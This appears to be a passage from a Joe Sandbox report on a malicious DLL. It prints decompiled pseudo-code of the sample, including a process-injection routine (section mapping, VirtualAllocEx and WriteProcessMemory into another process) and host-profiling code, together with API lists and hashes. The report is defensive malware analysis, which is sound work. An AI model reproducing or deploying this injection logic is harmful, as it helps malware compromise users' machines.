			E6DA5CB89(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_t75 = E6DA5C463(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6DA5C463(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6DA5A418(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6DA5A34B(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6DA5C75F(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6DA60BF9(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x6da5cb89
0x6da5cb89
0x6da5cb90
0x6da5cb99
0x6da5ccb8
0x6da5cb9f
0x6da5cba1
0x6da5cbab
0x6da5cbae
0x6da5cbb4
0x6da5cbbe
0x6da5cbe3
0x6da5cbe8
0x6da5cbed
0x6da5ccb4
0x00000000
0x6da5ccb5
0x6da5cbed
0x6da5cbbe
0x6da5cbf3
0x6da5cbf6
0x6da5cbf9
0x6da5cbff
0x6da5cc05
0x6da5cc17
0x6da5cc1c
0x6da5cc1f
0x6da5cc22
0x6da5cc25
0x6da5cc28
0x6da5cc2e
0x6da5cc34
0x6da5cc37
0x6da5cc3a
0x6da5cc49
0x6da5cc4a
0x6da5cc4a
0x6da5cc4f
0x6da5cc62
0x6da5cc64
0x6da5cc69
0x6da5cc74
0x6da5cc76
0x6da5cc78
0x6da5cc94
0x6da5cc99
0x6da5cc9c
0x6da5cc9c
0x6da5cc74
0x6da5cc69
0x6da5cca2
0x6da5cca3
0x6da5cca6
0x6da5cca9
0x6da5ccac
0x6da5ccaf
0x6da5cc3a
0x00000000
0x6da5cc2e
0x6da5ccb9
0x6da5ccbe
0x6da5ccc2
0x6da5ccc5
0x6da5ccc6
0x6da5ccc7
0x6da5ccc8
0x6da5cccd
0x6da5cd45
0x6da5cd47
0x6da5cccf
0x6da5cccf
0x6da5ccd5
0x00000000
0x6da5ccd7
0x6da5ccda
0x6da5ccdd
0x6da5cce4
0x6da5cce7
0x6da5cceb
0x6da5cd1d
0x6da5cd20
0x6da5cd27
0x6da5cd2d
0x6da5cd37
0x6da5cd40
0x6da5cd40
0x6da5cd37
0x6da5cd2d
0x6da5cd41
0x6da5cced
0x6da5cced
0x6da5cced
0x6da5ccf0
0x6da5ccf0
0x6da5ccf4
0x00000000
0x00000000
0x6da5ccf8
0x6da5cd0c
0x6da5cd0c
0x6da5ccfa
0x6da5ccfa
0x6da5cd00
0x00000000
0x6da5cd02
0x6da5cd02
0x6da5cd05
0x6da5cd0a
0x00000000
0x00000000
0x00000000
0x00000000
0x6da5cd0a
0x6da5cd00
0x6da5cd15
0x6da5cd17
0x00000000
0x6da5cd19
0x6da5cd19
0x6da5cd19
0x00000000
0x6da5cd17
0x6da5cd10
0x6da5cd12
0x00000000
0x6da5cd12
0x00000000
0x00000000
0x00000000
0x6da5ccdd
0x6da5ccd5
0x6da5cd48
0x6da5cd4c
0x6da5cd4c

APIs

RtlEncodePointer.NTDLL(00000000), ref: 6DA5CBAE

Strings

RCC, xrefs: 6DA5CBC8
MOC, xrefs: 6DA5CBC0

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 67f705c5910c3acd43f2d95382c6a49560cff064421e32a210bfe07065d10661
Instruction ID: fcdc03df213798846092365ca73e21793161d93fae1a75741d5096e17883f373
Opcode Fuzzy Hash: 67f705c5910c3acd43f2d95382c6a49560cff064421e32a210bfe07065d10661
Instruction Fuzzy Hash: 51418A7590820AAFCF01CF94CD80AEE7BB5FF88304F198159FA18A7215D335A9A1DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6DA6A1D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA6A1D1() {

				 *0x6daa5c40 = GetCommandLineA();
				 *0x6daa5c44 = GetCommandLineW();
				return 1;
			}

0x6da6a1d7
0x6da6a1e2
0x6da6a1e9

APIs

GetCommandLineA.KERNEL32 ref: 6DA6A1D1
GetCommandLineW.KERNEL32 ref: 6DA6A1DC

Strings

P3l, xrefs: 6DA6A1D7

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: CommandLine
String ID: P3l
API String ID: 3253501508-596819937
Opcode ID: 70d1ce39a2a0b98388b97efa4eea821f59d53f74b01a41ab5bed674e33f5dd90
Instruction ID: d2b685376128c2064552a6f84c496b5e7af2e7907c8d40db79e0cdc80a730a01
Opcode Fuzzy Hash: 70d1ce39a2a0b98388b97efa4eea821f59d53f74b01a41ab5bed674e33f5dd90
Instruction Fuzzy Hash: AEB0487C8483118B8F149F30C12C6183AF0B21F2123868255D406C6644DB7800038E08

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 5828, Parent PID: 1540COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	63

Executed Functions

Function 02BCD538 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223
nativeregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E02BCD538(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x2bdf8d4; // 0x483fc00
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E02BCF15B(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x2bdf9d0; // 0x483fa00
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x2bdf8d0; // 0x483f8c0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x2bdce70; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x2bdf8d0; // 0x483f8c0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E02BC8E2E( *0x2bdf8d4, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E02BC8DDF( &_v36, 0x1ac4);
					_t119 =  *0x2bdf8d4; // 0x483fc00
					_t155 =  *0x2bdf8e8; // 0x2bc0000
					_v36 = _t119;
					 *0x2bdf8e8 = _v8;
					 *0x2bdf8d4 = _t163;
					E02BC8EA6(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E02BCD4B7(_v16, _v8, _v44);
					_t124 = E02BCA5D0("Jjischug");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x2bdf8e8 = _t155;
						 *0x2bdf8d4 = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}

0x02bcd53e
0x02bcd544
0x02bcd546
0x02bcd54a
0x02bcd54c
0x02bcd54f
0x02bcd552
0x02bcd555
0x02bcd558
0x02bcd55b
0x02bcd566
0x02bcd569
0x02bcd570
0x02bcd570
0x02bcd575
0x02bcd578
0x02bcd57a
0x02bcd57d
0x02bcd586
0x02bcd77f
0x02bcd77f
0x02bcd782
0x02bcd785
0x02bcd78a
0x02bcd790
0x02bcd793
0x02bcd793
0x02bcd796
0x02bcd79a
0x02bcd79c
0x02bcd7b1
0x02bcd7b1
0x02bcd7bb
0x02bcd7c5
0x02bcd7c5
0x02bcd7cc
0x02bcd7cc
0x02bcd595
0x02bcd5af
0x00000000
0x00000000
0x02bcd5b5
0x02bcd5bd
0x02bcd5c5
0x02bcd5cb
0x02bcd5d2
0x02bcd5da
0x02bcd5db
0x02bcd5e2
0x02bcd5e5
0x02bcd5e6
0x02bcd5ed
0x02bcd5f0
0x02bcd5f7
0x02bcd5f8
0x02bcd5fb
0x02bcd607
0x02bcd629
0x02bcd631
0x02bcd634
0x02bcd63f
0x02bcd63f
0x02bcd631
0x02bcd65b
0x02bcd66a
0x02bcd66d
0x02bcd672
0x00000000
0x02bcd69c
0x02bcd6ac
0x02bcd6ae
0x02bcd6b5
0x00000000
0x00000000
0x02bcd6ca
0x02bcd6dd
0x02bcd6f1
0x02bcd6fd
0x02bcd702
0x02bcd707
0x02bcd70d
0x02bcd713
0x02bcd71b
0x02bcd72b
0x02bcd737
0x02bcd741
0x02bcd749
0x02bcd74e
0x02bcd751
0x02bcd759
0x02bcd759
0x02bcd759
0x02bcd75c
0x02bcd760
0x02bcd761
0x02bcd765
0x02bcd769
0x02bcd772
0x02bcd778
0x00000000
0x02bcd778
0x02bcd753
0x02bcd757
0x00000000
0x00000000
0x00000000
0x02bcd757

APIs

NtCreateSection.NTDLL(02BCDA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 02BCD5AA
RegisterClassExA.USER32(?), ref: 02BCD5FE
CreateWindowExA.USER32 ref: 02BCD629
DestroyWindow.USER32(00000000), ref: 02BCD634
UnregisterClassA.USER32 ref: 02BCD63F
NtMapViewOfSection.NTDLL(02BCDA07,00000000), ref: 02BCD66A
NtMapViewOfSection.NTDLL(02BCDA07,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 02BCD691
VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 02BCD6D7
WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 02BCD6F1

Part of subcall function 02BC8DDF: HeapFree.KERNEL32(00000000,00000000), ref: 02BC8E25

lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,02BC6297), ref: 02BCD769
NtUnmapViewOfSection.NTDLL(00000000), ref: 02BCD7B1
NtClose.NTDLL(00000000), ref: 02BCD7C5

Strings

Jjischug, xrefs: 02BCD73C
18293, xrefs: 02BCD5B5
0, xrefs: 02BCD5F0
aeroflot, xrefs: 02BCD5C0

Memory Dump Source

Source File: 00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2bc0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
String ID: 0$18293$Jjischug$aeroflot
API String ID: 494031690-3772587274
Opcode ID: bca58a35a295eef6a332d8a4a72057030bbbb48a7f8804ef0042bee68ebeab27
Instruction ID: bddf24603082e68ea8fd0e417103e90fcf147d5c2959ece81518474d10435d72
Opcode Fuzzy Hash: bca58a35a295eef6a332d8a4a72057030bbbb48a7f8804ef0042bee68ebeab27
Instruction Fuzzy Hash: 688107B5E41219EFDB00DF94DC94AEEBBB9FF08744F2444AAE605E7250E771A910CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02BCDFC2 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E02BCDFC2(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x2bdf8e8; // 0x2bc0000
				_t68 = E02BC8DC9(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x2bdf8d0; // 0x483f8c0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E02BD35A9( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x2bdf8d0; // 0x483f8c0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E02BC97E9(_t194, _t207);
					}
					_t75 =  *0x2bdf8d0; // 0x483f8c0
					_t77 = E02BCCA0A( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E02BCCB85( *_t77) == 0) {
						_t79 = E02BCCA5A(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E02BCF3A0(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E02BCF365(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x2bdf8d8; // 0x483fab0
					_push(0); // executed
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E02BCDFBB(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E02BC97E9(_t149, _t211);
					}
					_t92 = E02BCC85A();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E02BCC64D(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E02BC9BD5(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E02BC9803(_t149, _t36);
					_t97 = E02BCE34A(_t196, E02BCA5D0(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E02BCC870(_t97, _t37, _t216);
					_t99 =  *0x2bdf8d0; // 0x483f8c0
					_t101 = E02BCCBD7( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E02BC8F63(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E02BCDDBE(_t100);
					_t106 = E02BCDDE7(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E02BC9F85(_t105, 0xf73);
					_t177 =  *0x2bdf8d0; // 0x483f8c0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x2bdf8d0; // 0x483f8c0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E02BC8D9A( &_v8);
					_t113 =  *0x2bdf8d0; // 0x483f8c0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E02BC9FE4(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x2bdf8d0; // 0x483f8c0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x2bdf8d0; // 0x483f8c0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x2bdf8d0; // 0x483f8c0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x2bdf8d0; // 0x483f8c0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x2bdf8d0; // 0x483f8c0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x2bdf8d0; // 0x483f8c0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E02BD35A9(E02BCE34A(_t62, E02BCA5D0(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E02BD357B( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E02BC98D0(_t66, _t191);
					_t134 = E02BCDB68(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}

0x02bcdfc2
0x02bcdfcc
0x02bcdfd8
0x02bcdfdd
0x02bcdfe2
0x02bcdfef
0x02bcdff5
0x02bcdffa
0x02bce000
0x02bce010
0x02bce015
0x02bce01a
0x02bce01a
0x02bce02a
0x02bce030
0x02bce032
0x02bce03b
0x02bce03b
0x02bce041
0x02bce04e
0x02bce053
0x02bce059
0x02bce062
0x02bce070
0x02bce077
0x02bce07c
0x02bce07c
0x02bce07d
0x02bce064
0x02bce064
0x02bce064
0x02bce083
0x02bce089
0x02bce08e
0x02bce094
0x02bce099
0x02bce09f
0x02bce09f
0x02bce0a8
0x02bce0ae
0x02bce0b2
0x02bce0b9
0x02bce0c0
0x02bce0c7
0x02bce0cb
0x02bce0d2
0x02bce0d3
0x02bce0d5
0x02bce0da
0x02bce0e1
0x02bce0e3
0x02bce0e3
0x02bce0f3
0x02bce0f8
0x02bce0f8
0x02bce105
0x02bce10b
0x02bce110
0x02bce112
0x02bce11b
0x02bce11b
0x02bce123
0x02bce128
0x02bce128
0x02bce12e
0x02bce139
0x02bce13e
0x02bce146
0x02bce14c
0x02bce154
0x02bce166
0x02bce16c
0x02bce174
0x02bce179
0x02bce186
0x02bce197
0x02bce19d
0x02bce1a2
0x02bce1a5
0x02bce1a8
0x02bce1b5
0x02bce1bb
0x02bce1c5
0x02bce1c5
0x02bce1cb
0x02bce1d3
0x02bce1de
0x02bce1e3
0x02bce1e9
0x02bce1eb
0x02bce1f8
0x02bce1f9
0x02bce1fa
0x02bce205
0x02bce207
0x02bce20e
0x02bce20e
0x02bce218
0x02bce21d
0x02bce222
0x02bce222
0x02bce228
0x02bce22f
0x02bce230
0x02bce23d
0x02bce250
0x02bce255
0x02bce25a
0x02bce263
0x02bce263
0x02bce269
0x02bce26e
0x02bce274
0x02bce27a
0x02bce27f
0x02bce288
0x02bce28a
0x02bce291
0x02bce291
0x02bce297
0x02bce29f
0x02bce2a4
0x02bce2a5
0x02bce2aa
0x02bce2b3
0x02bce2b5
0x02bce2c0
0x02bce2c0
0x02bce2c9
0x02bce2d1
0x02bce2d8
0x02bce2dd
0x02bce2ec
0x02bce304
0x02bce30b
0x02bce319
0x02bce324
0x02bce325
0x02bce329
0x02bce32f
0x02bce330
0x02bce338
0x02bce33d
0x00000000
0x02bce345
0x02bce349

APIs

Part of subcall function 02BC8DC9: RtlAllocateHeap.NTDLL(00000008,?,?,02BC9793,00000100,?,02BC661B), ref: 02BC8DD7

GetCurrentProcessId.KERNEL32 ref: 02BCDFE9
GetLastError.KERNEL32 ref: 02BCE0E3
GetSystemMetrics.USER32(00001000), ref: 02BCE0F3
GetVersionExA.KERNEL32(00000000), ref: 02BCE1A8

Part of subcall function 02BCCA5A: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,02BC0000), ref: 02BCCAFE

GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 02BCE1D3

Strings

TEMP, xrefs: 02BCE274, 02BCE27F, 02BCE290
SystemDrive, xrefs: 02BCE29F, 02BCE2AA, 02BCE2BF
TEMP, xrefs: 02BCE23F
%s\%s, xrefs: 02BCE245
USERPROFILE, xrefs: 02BCE230, 02BCE25E

Memory Dump Source

